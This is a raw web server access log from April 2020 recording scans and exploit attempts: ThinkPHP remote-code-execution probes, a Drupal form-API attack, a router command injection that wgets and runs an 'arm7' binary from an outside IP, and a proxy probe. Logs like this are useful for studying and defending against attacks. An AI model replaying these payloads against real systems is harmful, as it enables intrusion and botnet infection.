112.29.173.27 - - [04/Apr/2020:06:46:12 +0900] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 12830 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
112.29.173.27 - - [04/Apr/2020:06:46:12 +0900] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 12830 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
112.29.173.27 - - [04/Apr/2020:06:46:13 +0900] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 12830 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
112.29.173.27 - - [04/Apr/2020:06:49:09 +0900] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.1" 404 12830 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
12.192.164.250 - - [04/Apr/2020:07:21:21 +0900] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 157 "-" "-"
5.101.0.209 - - [04/Apr/2020:16:51:22 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 4339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.13.93.90 - - [04/Apr/2020:17:55:23 +0900] "CONNECT ip.ws.126.net:443 HTTP/1.1" 400 157 "-" "-"